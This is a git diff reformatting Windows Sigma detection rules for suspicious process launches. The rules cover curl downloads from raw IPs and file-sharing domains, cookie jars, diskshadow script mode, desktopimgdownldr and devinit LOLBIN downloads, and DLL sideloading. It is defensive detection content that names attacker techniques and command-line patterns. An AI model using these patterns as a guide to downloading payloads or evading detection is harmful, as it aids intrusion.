OriginalFileName: + - csi.exe + - rcsi.exe selection_cli: Company: Microsoft Corporation condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_csvde_export.yml b/sigma/builtin/process_creation/proc_creation_win_csvde_export.yml index dce32a6e3..0a5842e15 100644 --- a/sigma/builtin/process_creation/proc_creation_win_csvde_export.yml +++ b/sigma/builtin/process_creation/proc_creation_win_csvde_export.yml @@ -1,8 +1,7 @@ title: Active Directory Structure Export Via Csvde.EXE id: e5d36acd-acb4-4c6f-a13f-9eb203d50099 status: experimental -description: Detects the execution of "csvde.exe" in order to export organizational - Active Directory structure. +description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. references: - https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \csvde.exe - - OriginalFileName: csvde.exe + - NewProcessName|endswith: \csvde.exe + - OriginalFileName: csvde.exe selection_remote: - CommandLine|contains: ' -f' + CommandLine|contains: ' -f' filter_import: - CommandLine|contains: ' -i' + CommandLine|contains: ' -i' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_cookie_hijacking.yml b/sigma/builtin/process_creation/proc_creation_win_curl_cookie_hijacking.yml index 953bf130c..f211b5a4c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_cookie_hijacking.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_cookie_hijacking.yml @@ -1,8 +1,7 @@ title: Potential Cookies Session Hijacking id: 5a6e1e16-07de-48d8-8aae-faa766c05e88 status: experimental -description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie - data. +description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) @@ -17,11 +16,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - - CommandLine|re: \s-c\s - - CommandLine|contains: --cookie-jar + - CommandLine|re: \s-c\s + - CommandLine|contains: --cookie-jar condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_custom_user_agent.yml b/sigma/builtin/process_creation/proc_creation_win_curl_custom_user_agent.yml index a35767084..d914c3e70 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_custom_user_agent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_custom_user_agent.yml @@ -1,9 +1,7 @@ title: Curl Web Request With Potential Custom User-Agent id: 85de1f22-d189-44e4-8239-dc276b45379b status: experimental -description: Detects execution of "curl.exe" with a potential custom "User-Agent". - Attackers can leverage this to download or exfiltrate data via "curl" to a domain - that only accept specific "User-Agent" strings +description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv @@ -19,11 +17,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_header: - CommandLine|re: \s-H\s - CommandLine|contains: 'User-Agent:' + CommandLine|re: \s-H\s # Must be Regex as the flag needs to be case sensitive + CommandLine|contains: 'User-Agent:' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml b/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml index 349f31c38..a70b92b70 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml @@ -1,8 +1,8 @@ title: File Download From IP URL Via Curl.EXE id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218 related: - - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 - type: similar + - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 + type: similar status: experimental description: Detects file downloads directly from IP address URL using curl.exe references: @@ -21,19 +21,20 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output filter_main_ext: - CommandLine|endswith: + # Note: This filter exists to avoid duplication with 5cb299fc-5fb1-4d07-b989-0644c68b6043 + CommandLine|endswith: - .bat - .bat" - .dat diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml b/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml index 938f0ec05..72efb2ff2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From IP Via Curl.EXE id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 status: experimental -description: Detects potentially suspicious file downloads directly from IP addresses - using curl.exe +description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv @@ -19,19 +18,20 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output selection_ext: - CommandLine|endswith: + # Note: If you add more extensions please consider adding them also in 9cc85849-3b02-4cb5-b371-3a1ff54f2218 + CommandLine|endswith: - .bat - .bat" - .dat diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml b/sigma/builtin/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml index d466c1dfe..0dfa95f6a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From File Sharing Domain Via Curl.EXE id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb status: experimental -description: Detects potentially suspicious file download from file sharing domains - using curl.exe +description: Detects potentially suspicious file download from file sharing domains using curl.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_websites: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ @@ -48,14 +47,14 @@ detection: - transfer.sh - ufile.io selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_insecure_connection.yml b/sigma/builtin/process_creation/proc_creation_win_curl_insecure_connection.yml index 637884a31..8a7486c19 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_insecure_connection.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_insecure_connection.yml @@ -16,11 +16,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - - CommandLine|re: \s-k\s - - CommandLine|contains: --insecure + - CommandLine|re: \s-k\s + - CommandLine|contains: --insecure condition: process_creation and (all of selection_*) falsepositives: - Access to badly maintained internal or development systems diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml b/sigma/builtin/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml index 51515e3d2..47c4809a3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml @@ -1,8 +1,7 @@ title: Insecure Proxy/DOH Transfer Via Curl.EXE id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77 status: experimental -description: Detects execution of "curl.exe" with the "insecure" flag over proxy or - DOH. +description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) @@ -17,10 +16,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - --doh-insecure - --proxy-insecure condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_local_file_read.yml b/sigma/builtin/process_creation/proc_creation_win_curl_local_file_read.yml index 342cde3c5..5b2cd3db7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_local_file_read.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_local_file_read.yml @@ -1,8 +1,7 @@ title: Local File Read Using Curl.EXE id: aa6f6ea6-0676-40dd-b510-6e46f02d8867 status: experimental -description: Detects execution of "curl.exe" with the "file://" protocol handler in - order to read local files. +description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) @@ -17,10 +16,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - OriginalFileName: curl.exe + - NewProcessName|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - CommandLine|contains: file:/// + CommandLine|contains: file:/// condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_curl_susp_download.yml b/sigma/builtin/process_creation/proc_creation_win_curl_susp_download.yml index 86008bca0..278c15944 100644 --- a/sigma/builtin/process_creation/proc_creation_win_curl_susp_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_curl_susp_download.yml @@ -1,13 +1,12 @@ title: Suspicious Curl.EXE Download id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 related: - - id: bbeaed61-1990-4773-bf57-b81dbad7db2d - type: derived - - id: 9a517fca-4ba3-4629-9278-a68694697b81 - type: similar + - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution + type: derived + - id: 9a517fca-4ba3-4629-9278-a68694697b81 # Curl download + type: similar status: test -description: Detects a suspicious curl process start on Windows and outputs the requested - document to a local file +description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file references: - https://twitter.com/max_mal_/status/1542461200797163522 - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 @@ -28,10 +27,10 @@ detection: EventID: 4688 Channel: Security selection_curl: - - NewProcessName|endswith: \curl.exe - - Product: The curl executable + - NewProcessName|endswith: \curl.exe + - Product: The curl executable selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - '%AppData%' - '%Public%' - '%Temp%' @@ -44,7 +43,7 @@ detection: - C:\ProgramData\ - C:\Windows\Temp\ selection_susp_extensions: - CommandLine|endswith: + CommandLine|endswith: - .dll - .gif - .jpeg @@ -56,14 +55,15 @@ detection: - .vbe - .vbs filter_optional_git_windows: - CommandLine|contains|all: + # Example FP + # CommandLine: "C:\Program Files\Git\mingw64\bin\curl.exe" --silent --show-error --output C:/Users/test/AppData/Local/Temp/gfw-httpget-jVOEoxbS.txt --write-out %{http_code} https://gitforwindows.org/latest-tag.txt + CommandLine|contains|all: - '--silent --show-error --output ' - gfw-httpget- - AppData ParentProcessName: C:\Program Files\Git\usr\bin\sh.exe - NewProcessName: C:\Program Files\Git\mingw64\bin\curl.exe - condition: process_creation and (selection_curl and 1 of selection_susp_* and - not 1 of filter_optional_*) + NewProcessName: C:\Program Files\Git\mingw64\bin\curl.exe + condition: process_creation and (selection_curl and 1 of selection_susp_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml b/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml index 779041ba6..67a987925 100644 --- a/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml @@ -1,9 +1,7 @@ title: Remote File Download Via Desktopimgdownldr Utility id: 214641c2-c579-4ecb-8427-0cf19df6842e status: test -description: Detects the desktopimgdownldr utility being used to download a remote - file. An adversary may use desktopimgdownldr to download arbitrary files as an - alternative to certutil. +description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. references: - https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html author: Tim Rauch @@ -19,8 +17,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /lockscreenurl:http - NewProcessName|endswith: \desktopimgdownldr.exe + CommandLine|contains: /lockscreenurl:http + NewProcessName|endswith: \desktopimgdownldr.exe ParentProcessName|endswith: \desktopimgdownldr.exe condition: process_creation and selection falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml index 97621f8ea..4afacee48 100644 --- a/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Desktopimgdownldr Command id: bb58aa4a-b80b-415a-a2c0-2f65a4c81009 status: test -description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters - used to download files from the Internet +description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet references: - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ - https://twitter.com/SBousseaden/status/1278977301745741825 @@ -20,14 +19,14 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: ' /lockscreenurl:' + CommandLine|contains: ' /lockscreenurl:' selection1_filter: - CommandLine|contains: + CommandLine|contains: - .jpg - .jpeg - .png selection_reg: - CommandLine|contains|all: + CommandLine|contains|all: - reg delete - \PersonalizationCSP condition: process_creation and (( selection1 and not selection1_filter ) or selection_reg) @@ -35,7 +34,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml b/sigma/builtin/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml index ae77f9ab8..42f9ea3cf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml +++ b/sigma/builtin/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml @@ -1,16 +1,12 @@ title: Potential DLL Sideloading Via DeviceEnroller.EXE id: e173ad47-4388-4012-ae62-bd13f71c18a8 related: - - id: ee4c5d06-3abc-48cc-8885-77f1c20f4451 - type: similar + - id: ee4c5d06-3abc-48cc-8885-77f1c20f4451 + type: similar status: test -description: 'Detects the use of the PhoneDeepLink parameter to potentially sideload - a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". - - Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe - using this parameter - - ' +description: | + Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". + Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter references: - https://mobile.twitter.com/0gtweet/status/1564131230941122561 - https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html @@ -28,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \deviceenroller.exe - - OriginalFileName: deviceenroller.exe + - NewProcessName|endswith: \deviceenroller.exe + - OriginalFileName: deviceenroller.exe selection_cli: - CommandLine|contains: /PhoneDeepLink + CommandLine|contains: /PhoneDeepLink condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_devinit_lolbin_usage.yml b/sigma/builtin/process_creation/proc_creation_win_devinit_lolbin_usage.yml index 6973c3d95..37d8523ed 100644 --- a/sigma/builtin/process_creation/proc_creation_win_devinit_lolbin_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_devinit_lolbin_usage.yml @@ -1,9 +1,7 @@ title: Arbitrary MSI Download Via Devinit.EXE id: 90d50722-0483-4065-8e35-57efaadd354d status: test -description: Detects a certain command line flag combination used by "devinit.exe", - which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows - system +description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system references: - https://twitter.com/mrd0x/status/1460815932402679809 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/ @@ -22,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t msi-install ' - ' -i http' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml index 13cb7ffc9..39ef54c42 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Child Process Of ClickOnce Application id: 67bc0e75-c0a9-4cfc-8754-84a505b63c04 status: experimental -description: Detects potentially suspicious child processes of a ClickOnce deployment - application +description: Detects potentially suspicious child processes of a ClickOnce deployment application references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +18,8 @@ detection: Channel: Security selection: ParentProcessName|contains: \AppData\Local\Apps\2.0\ - NewProcessName|endswith: + NewProcessName|endswith: + # Add more suspicious processes - \calc.exe - \cmd.exe - \cscript.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_dirlister_execution.yml b/sigma/builtin/process_creation/proc_creation_win_dirlister_execution.yml index f3083a42a..19b8c9ccc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dirlister_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dirlister_execution.yml @@ -1,9 +1,7 @@ title: DirLister Execution id: b4dc61f5-6cce-468e-a608-b48b469feaa2 status: test -description: Detect the usage of "DirLister.exe" a utility for quickly listing folder - or drive contents. It was seen used by BlackCat ransomware to create a list of - accessible directories and files. +description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md - https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/ @@ -21,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: DirLister.exe - - NewProcessName|endswith: \dirlister.exe + - OriginalFileName: DirLister.exe + - NewProcessName|endswith: \dirlister.exe condition: process_creation and selection falsepositives: - Legitimate use by users diff --git a/sigma/builtin/process_creation/proc_creation_win_diskshadow_child_process_susp.yml b/sigma/builtin/process_creation/proc_creation_win_diskshadow_child_process_susp.yml index 37cd1b985..f19910729 100644 --- a/sigma/builtin/process_creation/proc_creation_win_diskshadow_child_process_susp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_diskshadow_child_process_susp.yml @@ -1,18 +1,16 @@ title: Potentially Suspicious Child Process Of DiskShadow.EXE id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: Detects potentially suspicious child processes of "Diskshadow.exe". This - could be an attempt to bypass parent/child relationship detection or application - whitelisting rules. +description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -35,7 +33,8 @@ detection: Channel: Security selection: ParentProcessName|endswith: \diskshadow.exe - NewProcessName|endswith: + NewProcessName|endswith: + # Note: add or remove additional binaries according to your org needs - \certutil.exe - \cscript.exe - \mshta.exe @@ -46,7 +45,6 @@ detection: - \wscript.exe condition: process_creation and selection falsepositives: - - False postitve can occur in cases where admin scripts levreage the "exec" flag - to execute applications + - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml b/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml index b6f26f3d5..af72803fc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml +++ b/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml @@ -1,21 +1,18 @@ title: Diskshadow Script Mode - Uncommon Script Extension Execution id: 1dde5376-a648-492e-9e54-4241dd9b0c7f related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: 'Detects execution of "Diskshadow.exe" in script mode to execute an script - with a potentially uncommon extension. - +description: | + Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required. - - ' references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -37,17 +34,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: diskshadow.exe - - NewProcessName|endswith: \diskshadow.exe + - OriginalFileName: diskshadow.exe + - NewProcessName|endswith: \diskshadow.exe selection_flag: - CommandLine|contains: + CommandLine|contains: - '/s ' - '-s ' filter_main_ext: - CommandLine|contains: .txt + # Note: can be changed to an "endswith" to avoid rare FPs. But you need to account for quoted paths + # Note: Using the ".txt" is based on the MS documentation example. Best add the extension you use internally before using this rule + CommandLine|contains: .txt condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - False postitve might occur with legitimate or uncommon extensions used internally. - Initial baseline is required. + - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml index abf69af4e..08ded7806 100644 --- a/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml @@ -1,17 +1,16 @@ title: Diskshadow Script Mode - Execution From Potential Suspicious Location id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 related: - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag - where the script is located in a potentially suspicious location. +description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -33,14 +32,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: diskshadow.exe - - NewProcessName|endswith: \diskshadow.exe + - OriginalFileName: diskshadow.exe + - NewProcessName|endswith: \diskshadow.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '/s ' - '-s ' selection_paths: - CommandLine|contains: + CommandLine|contains: + # Note: Add additional susp paths based on your org needs - :\Temp\ - :\Windows\Temp\ - \AppData\Local\ @@ -49,7 +49,6 @@ detection: - \Users\Public\ condition: process_creation and (all of selection_*) falsepositives: - - False positives may occur if you execute the script from one of the paths mentioned - in the rule. Apply additional filters that fits your org needs. + - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml b/sigma/builtin/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml index 53e987432..6369437d4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml @@ -1,8 +1,7 @@ title: DLL Sideloading by VMware Xfer Utility id: ebea773c-a8f1-42ad-a856-00cb221966e8 status: test -description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the - non-default directory which may be an attempt to sideload arbitrary DLL +description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL references: - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,9 +17,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \VMwareXferlogs.exe - filter: - NewProcessName|startswith: C:\Program Files\VMware\ + NewProcessName|endswith: \VMwareXferlogs.exe + filter: # VMware might be installed in another path so update the rule accordingly + NewProcessName|startswith: C:\Program Files\VMware\ condition: process_creation and (selection and not filter) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_dllhost_no_cli_execution.yml 